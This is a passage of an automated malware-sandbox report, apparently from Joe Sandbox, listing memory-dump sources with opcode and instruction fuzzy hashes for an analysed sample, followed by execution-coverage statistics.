                    • Opcode Fuzzy Hash: 1406748873067cbd84d8d34413278d3ccf659ce69a87ff5c5eeaa5b36491bd89
                    • Instruction Fuzzy Hash: 49410B75909208DBCB04CFA9E5445FDBBBAFB8E301F10E465D40AA7629CB359949CF50
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c5e3abd4dc4cf47a2d84f60ebb94188e28e0fbca0f0a7bbca55d037d76ad357
                    • Instruction ID: 63234beefb2ee09e64f0be1443e6fd48571b89f006fcb1672eb89668cc3dcf86
                    • Opcode Fuzzy Hash: 8c5e3abd4dc4cf47a2d84f60ebb94188e28e0fbca0f0a7bbca55d037d76ad357
                    • Instruction Fuzzy Hash: 4A51D074B002068FDB11EBB9984897FBBF7FFC42207248969E459D7391EB309D058751
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4da92904c4eafc56d620272729597effeff755cbc369e34c249824554f948a22
                    • Instruction ID: f565be2c9a3e0a6303b562623c1ec8f5b80ca2ad66104e4c801f8c870ebf0490
                    • Opcode Fuzzy Hash: 4da92904c4eafc56d620272729597effeff755cbc369e34c249824554f948a22
                    • Instruction Fuzzy Hash: 5D41D2B5D003198BDB24DF9AC584ADDFBF5BF48304F648529D409AB200D7B56A8ACF90
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24d4b4925d473bbd6dae20137c33e3d00f8512f794e25e244622944e819845e4
                    • Instruction ID: 7a4b48f45248ed312e9b5caf148fee85ae66bc35573792afedefb5a1adfa3381
                    • Opcode Fuzzy Hash: 24d4b4925d473bbd6dae20137c33e3d00f8512f794e25e244622944e819845e4
                    • Instruction Fuzzy Hash: 3A316174E0011E8FDB40EFA9C9957AFBBB6FB88314F205165D519A3388DB355C05CBA0
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4218d76e2d2fb7500c1c596a8e9715b700ae899170cf39d84bdf50d69d97086a
                    • Instruction ID: 00ce6b7f057a0c4ccb0808f28748319239f67f5865f178bf3da10db29f0911fb
                    • Opcode Fuzzy Hash: 4218d76e2d2fb7500c1c596a8e9715b700ae899170cf39d84bdf50d69d97086a
                    • Instruction Fuzzy Hash: 4B2167B2510248DFDF15DF58E9C0B26BF61FB88318F24C16DE9090B256C336D446DBA2
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f7c591213a5b82fc6a62c7744124956ca1c6f2fd2ee9d56b0a6cf8a5b265ece
                    • Instruction ID: a6ecb4253218dcd13673e312bf01a2c2b3431601ea4e3320fe763fae6be3bdaa
                    • Opcode Fuzzy Hash: 1f7c591213a5b82fc6a62c7744124956ca1c6f2fd2ee9d56b0a6cf8a5b265ece
                    • Instruction Fuzzy Hash: 8D2148B5510208DFDF05DF48C9C0B66BB65FB84324F24C16DD90A0B246C376E446DAA2
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c8ba44038a08230fc9403712705bcdbc8bd49f762fdc4f036ed86fb1e891207
                    • Instruction ID: ebd65babccef5a477c6fdc8ee568fe6358a8dcb82e1a3e01e00ef04fa3ea1ece
                    • Opcode Fuzzy Hash: 2c8ba44038a08230fc9403712705bcdbc8bd49f762fdc4f036ed86fb1e891207
                    • Instruction Fuzzy Hash: 5211E436E102159BDF04EFA5DC45AAE7BBAFFC5215F04C526E518EB250DB30A9098B90
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5eba39c4f62f36747eac0c76246995dcd183b41a178d2352a9e9cf4f10fc0695
                    • Instruction ID: cfea724ba2c73af0c4e0d09056fbd89836b4d5e44714545683657e2ec42f7d21
                    • Opcode Fuzzy Hash: 5eba39c4f62f36747eac0c76246995dcd183b41a178d2352a9e9cf4f10fc0695
                    • Instruction Fuzzy Hash: 012176B1654308DFDB15DF64D8C0B26BBA1FB88314F64C56DD90A0B646C37BD807CA62
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 03457db3a5d93a5b810dc65f9d82e961940325113f500de01ecf0a3410335165
                    • Instruction ID: 8e9e99312525ba52eba66efee83cb6f1bfa5306668d67694fb1e8337e148c025
                    • Opcode Fuzzy Hash: 03457db3a5d93a5b810dc65f9d82e961940325113f500de01ecf0a3410335165
                    • Instruction Fuzzy Hash: A12176B1514308EFEB01DF94C9C0B26BBA1FB84324F64C56DE90A0B653C37AD806CA61
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4786c5d97df61822a1c58681b04f30a05667eb0d610ad580e12a0b53a63da7ff
                    • Instruction ID: 89e38d4744d1c6b5395471c3fe5dd8af8aa92c7ecd41efb93fadcb47384e7c8c
                    • Opcode Fuzzy Hash: 4786c5d97df61822a1c58681b04f30a05667eb0d610ad580e12a0b53a63da7ff
                    • Instruction Fuzzy Hash: E331E3B0D01318DFDB20DFAAC588B9EBBF9EB48714F648419E404BB240C3B55889CF94
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ee9abc7f5d6de6d5eacfc47e3edb2d9bd985fe8b72def368bd7b6e08fde90540
                    • Instruction ID: 501cb7f71a82276ea226b996267a19a0975c0113f17be3faaddecd039cb44d49
                    • Opcode Fuzzy Hash: ee9abc7f5d6de6d5eacfc47e3edb2d9bd985fe8b72def368bd7b6e08fde90540
                    • Instruction Fuzzy Hash: 3521A174B102058FCB10EB78C4689AFBBFAEF81214F108969E506DB350EF74ED098B91
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cd40ecbe8425fbce3d12fb3bb9aa60f72801db4dca0ae3b1b41f0789d635a017
                    • Instruction ID: 430330632d45d444aff581c5b0313b3715232ee98ceab1a65f3b723c1b05441e
                    • Opcode Fuzzy Hash: cd40ecbe8425fbce3d12fb3bb9aa60f72801db4dca0ae3b1b41f0789d635a017
                    • Instruction Fuzzy Hash: 14110330B042088FCB14DB69C911BAA7B7BEF86300F6480E6D106CB3A6DE31DC05CB91
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae1d9b5c55701af71a3b4cc27d9d2dd905d4ffec5988957dce9ea1af94fe61af
                    • Instruction ID: 54c170649a533eadcf75a729e5a51b800c40468ae0994764c332a2576528aad3
                    • Opcode Fuzzy Hash: ae1d9b5c55701af71a3b4cc27d9d2dd905d4ffec5988957dce9ea1af94fe61af
                    • Instruction Fuzzy Hash: 8B21B0754483849FCB03CF24D994711BF71EB46314F28C5EAD9898F6A7C33A980ACB62
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 818ef0039ed6d19c28a3f4190888cf215f68e1c4f39a3bd9d1b7521a1500654a
                    • Instruction ID: 0040d7c511b3bc8b86340107e135ef8259ad364ac0a9f9322a690a23692d116a
                    • Opcode Fuzzy Hash: 818ef0039ed6d19c28a3f4190888cf215f68e1c4f39a3bd9d1b7521a1500654a
                    • Instruction Fuzzy Hash: 1911E574B143489FDB08EF74C81AAAD7BFDEB85205F1044AAE805C7251EA35EE069711
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                    • Instruction ID: 2f88cfe3e7ada778777546edfc70d6e694cbb8931910e3f2eeeb786c82d6f5aa
                    • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                    • Instruction Fuzzy Hash: 4111DF76404284CFCF12CF58D5C0B16BF71FB84314F24C6A9D9490B656C33AD45ADBA1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                    • Instruction ID: a0152c4432756a66dc39ac4bda9f055a4de2f36966d079051bd2ac0e55f9528e
                    • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                    • Instruction Fuzzy Hash: 8811CD76404284CFDF12CF48D5C0B56BF71FB84224F2482A9D9090B656C33AE456DBA1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae98b92b78396618bcc58cd98c1fff981c5bec04447b408b4b2664aaa5283fa2
                    • Instruction ID: 891ddaaf3d636635ab39229e4e74b542876fd353753ef86b71814c3cf62cd505
                    • Opcode Fuzzy Hash: ae98b92b78396618bcc58cd98c1fff981c5bec04447b408b4b2664aaa5283fa2
                    • Instruction Fuzzy Hash: 3F2103B6904349DFCB20CF9AD984BDEBBF4FB49310F548429E919A7210C374A954CFA5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 828237441800e4ade8ca06846bb7eca0f97da1439f92ef8a81261a02e0cdea5b
                    • Instruction ID: 329734a98470989382d7580f7f425df1023a14ea338d5447e89400850e6e1350
                    • Opcode Fuzzy Hash: 828237441800e4ade8ca06846bb7eca0f97da1439f92ef8a81261a02e0cdea5b
                    • Instruction Fuzzy Hash: 6011B4B4E1425C8BEB18DFAAC8546EEFBFABF89300F04C02AC415AB258DB741845CB50
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307804457.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_12ad000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                    • Instruction ID: 480022d4170e1f24a109b0c63f48404485d63cb4445eecf1af7fd88c1654d18e
                    • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                    • Instruction Fuzzy Hash: 6611BB75504284DFDB12CF54C5C4B15BBB1FB84324F28C6AAD9494BAA7C33AD40ACB61
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0152786110b10aca3a13bfa44cd975d8286ee41ecf184b7bc4264e1326310af8
                    • Instruction ID: 990416ed8634135d84c5052664fa3af3571c47c7e1241171b41a0eea31254fe1
                    • Opcode Fuzzy Hash: 0152786110b10aca3a13bfa44cd975d8286ee41ecf184b7bc4264e1326310af8
                    • Instruction Fuzzy Hash: 5C1190B5D006589BEB18CFA7D84579EFEF7AFC8300F14C06AD409A6254DB7509458F90
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88ca6b8930f04da8effcca480054fa7e6c5c996d60878c980cd1e9bce9d8b1ac
                    • Instruction ID: 1fa5735c63650307d23f46167801a73f211cb3b958a81c2a5ad740921ad80284
                    • Opcode Fuzzy Hash: 88ca6b8930f04da8effcca480054fa7e6c5c996d60878c980cd1e9bce9d8b1ac
                    • Instruction Fuzzy Hash: 6211F2B59043498FCB20DF9AD584BDEFBF4EB48320F24841AD959A7250C374A949CFA5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f5a359249cf3f88f8ba14ddb8cce698c738af18f7e38d6d8fcdb9f6eeaa87f3
                    • Instruction ID: 8656a70d6749abbf3b4d6ba0eae2682b9f2dc4808fcb2bb2e4fccd4dabefbab7
                    • Opcode Fuzzy Hash: 0f5a359249cf3f88f8ba14ddb8cce698c738af18f7e38d6d8fcdb9f6eeaa87f3
                    • Instruction Fuzzy Hash: A911F2B59043498FCB20DF9AD584BDEFBF8EB48220F24841AD959A7250C374A949CFA5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a18df76e3ec5ff937d473e8ddfb086363929b453a9bb1ecbb6006dd09efd9af2
                    • Instruction ID: 331bbc39ae59e3c2a4a36772172a126f0ccc2ead5ef8a8b85740fbe52ce21bc9
                    • Opcode Fuzzy Hash: a18df76e3ec5ff937d473e8ddfb086363929b453a9bb1ecbb6006dd09efd9af2
                    • Instruction Fuzzy Hash: 1F01D0714147859FFF244E5DDDC47EAFB98DF41224F18C45AEE090A246C3799440D671
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e6102e2fde78bbd81703da3180b2aa067b3302aeb9a4e7f3614a6fb174a177b
                    • Instruction ID: c2b149794ed280972ef22cb9cd3add4ee9e33277b8dbc40f0581bade9399a2bd
                    • Opcode Fuzzy Hash: 7e6102e2fde78bbd81703da3180b2aa067b3302aeb9a4e7f3614a6fb174a177b
                    • Instruction Fuzzy Hash: 0801FB39A08108DFC744DFA8D549AADBBFAEB49300F15D5D4E80A97366D734DE84DB40
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5700fc80c7605dd331cd89ba346fff8bcbb01490ba39279e8dcdfd5e939687a4
                    • Instruction ID: ec2932b714fc48776498babcb193e616c866c5e893e6f1ff26dd5d56d6584bad
                    • Opcode Fuzzy Hash: 5700fc80c7605dd331cd89ba346fff8bcbb01490ba39279e8dcdfd5e939687a4
                    • Instruction Fuzzy Hash: 71010070900208DFDB15DF9AC5487DEBEF5FB88360F24C169E818AB290C7748984CB94
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c7f6ab27d47c14f8ccf8ad53b6ef0d6ef28054f841befc5b1cd548e9436319e8
                    • Instruction ID: bad61eee5d5e687d9263020babff47cf14a65d6ee5474288449c10c64a979665
                    • Opcode Fuzzy Hash: c7f6ab27d47c14f8ccf8ad53b6ef0d6ef28054f841befc5b1cd548e9436319e8
                    • Instruction Fuzzy Hash: E9F0627490D208DBC704CF65E540ABDBBFEAF9E300F08E5A6D4095B21AD7309A48DF82
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 41dcfd7e318f3bde1857bb4326c1653c965597228ce1f0a78f30d5b455d3e587
                    • Instruction ID: fb1bf7cf1a71764c1e7c46ea183093c7a249a7b1370c1db8f5409c71f9b11fb3
                    • Opcode Fuzzy Hash: 41dcfd7e318f3bde1857bb4326c1653c965597228ce1f0a78f30d5b455d3e587
                    • Instruction Fuzzy Hash: DA01AFB6904309DFDB10CF89D948BDEBBF1EB98320F148009E515A7220C3799959CFB1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1307744545.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_129d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4f85758b9b9a2ee410b4d3440114864559db7ac7aa5c449d7dfc991e015919b0
                    • Instruction ID: 38e9fc89b8be0147a74d54b20a94191bbf6d7404f86b65a3a5c83e98924b3dfe
                    • Opcode Fuzzy Hash: 4f85758b9b9a2ee410b4d3440114864559db7ac7aa5c449d7dfc991e015919b0
                    • Instruction Fuzzy Hash: 4EF068754043449FEB248E19DD847A6FF98EF41724F18C45AED484F296C2799844DA71
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c8a697ba705a49327fb370858f3cc1a9f5a7f4ec97692d0f2ab0361c75ff86b7
                    • Instruction ID: b705b15c48b981f5d04e42a5dc43975bfd43f7768ad46b75e8d822acd2961bf0
                    • Opcode Fuzzy Hash: c8a697ba705a49327fb370858f3cc1a9f5a7f4ec97692d0f2ab0361c75ff86b7
                    • Instruction Fuzzy Hash: E4F0DAB0E0430ADFDB54DFA9C945AAEBFF5FB48200F1049A9E918E7300EB7195048B91
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e23d474709e4970b3e510694091d461f719d39c77f2313ef5d653e63712166f3
                    • Instruction ID: 2eb52f5b2581d0b8c596e0e44721b82359c17eda70299d9c359c2ce8f66f42e6
                    • Opcode Fuzzy Hash: e23d474709e4970b3e510694091d461f719d39c77f2313ef5d653e63712166f3
                    • Instruction Fuzzy Hash: FFE0EC74E1121EEFCF04FFA5E9419AD7BB9FB45204B2086A8E80993305DB326E149B71
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c574cf7a1420e0c51e5125bea670ca88473918d7fc70a54314067cbcf5975f78
                    • Instruction ID: 8c82de5df8db9df91b2824d169d41738c107ea93362be1c54c93b02ed68f549f
                    • Opcode Fuzzy Hash: c574cf7a1420e0c51e5125bea670ca88473918d7fc70a54314067cbcf5975f78
                    • Instruction Fuzzy Hash: 98E0B6B0E4520ADFD740EFB9C905A5EBBF1FF08600F1189A9D019E7211EB749A058F91
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                    • Instruction ID: 03be8aedca8fcf0b04da4ee015f52cbc310950018773c8f89c2f2271b565d3ec
                    • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                    • Instruction Fuzzy Hash: F0D05272C00138AB8B10AFE99C088EFFF78EF08A50B418122E915AB204D3720A20CBC1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f908113aa6653083c2c54dec31de8e19f9c252d1a1e58d6510309a7d210133d4
                    • Instruction ID: ac711f7ac685acb27c884bf527fdfa5d782bba75823b43b60d7d4d2f9973a913
                    • Opcode Fuzzy Hash: f908113aa6653083c2c54dec31de8e19f9c252d1a1e58d6510309a7d210133d4
                    • Instruction Fuzzy Hash: F7D0A972D0420CEFCB00DFA9D94049EBBF9DF4A100B1009EAC54AD7210FD319A0097E1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d518d19febaf6c21557e1a14265bcc74898ed462f460fa474f772ec103477279
                    • Instruction ID: 9e08b1492e166d0b06a45587b8180aac6d46a8ad7f3d940bf461e0f11bc4cded
                    • Opcode Fuzzy Hash: d518d19febaf6c21557e1a14265bcc74898ed462f460fa474f772ec103477279
                    • Instruction Fuzzy Hash: 53D012362401085E4B40EFD4E844C6277DEBB64740B00C832E504C7121F621F438D751
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d134d1bf383602fd161c4790d78f188d7e24561c7205e50a41a5e404db753db
                    • Instruction ID: 80bddd97a46bedff95a71d722fd9eaa8199e87b712fd1d14a9b5865c1d5c431d
                    • Opcode Fuzzy Hash: 2d134d1bf383602fd161c4790d78f188d7e24561c7205e50a41a5e404db753db
                    • Instruction Fuzzy Hash: 24C08C3006070C87D7542BA0FA0E3787FBC6706302F002020F00E800128FB41490CB65
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cfd56d3110447cb232479df0575c2a09058443394e58841582238021b528d32d
                    • Instruction ID: d7fe743b368c4dbefd055622e7cad2d4ac4b9c723c36ce62d636b55919cd79dd
                    • Opcode Fuzzy Hash: cfd56d3110447cb232479df0575c2a09058443394e58841582238021b528d32d
                    • Instruction Fuzzy Hash: B4B0127925C201B3940066608CD5F1F9091ABE6740BC5CC017205120008CF0587CE27F
                    Memory Dump Source
                    • Source File: 00000001.00000002.1315550895.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5960000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0910a44352096d03c595385b20c0c3db5ba6344ea939391f2e249e8b865a658b
                    • Instruction ID: 4db72d209b0831ad11a0ecdddb81f4746163b56cfff3c190afdea11647b54810
                    • Opcode Fuzzy Hash: 0910a44352096d03c595385b20c0c3db5ba6344ea939391f2e249e8b865a658b
                    • Instruction Fuzzy Hash: ABD1F335D2075A8ACB10EBA4D8906A9F771FF96200F50C7AAE10A77214EF706AC5CF91
                    Memory Dump Source
                    • Source File: 00000001.00000002.1308091176.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_1440000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 68edf125607f285329af7a9bfed489e044150e7d1675bd15e95dfbba0b3dbfe6
                    • Instruction ID: 670aa383b231283c57d4ff45780b92b2d4ebec33853851d5388f67acc671c907
                    • Opcode Fuzzy Hash: 68edf125607f285329af7a9bfed489e044150e7d1675bd15e95dfbba0b3dbfe6
                    • Instruction Fuzzy Hash: A9A18032E006068FDF15DFB9C4445EEBBB2FFA5300B25456AE905AB365DB31E916CB80

                    Execution Graph

                    Execution Coverage:9.4%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:48
                    Total number of Limit Nodes:4
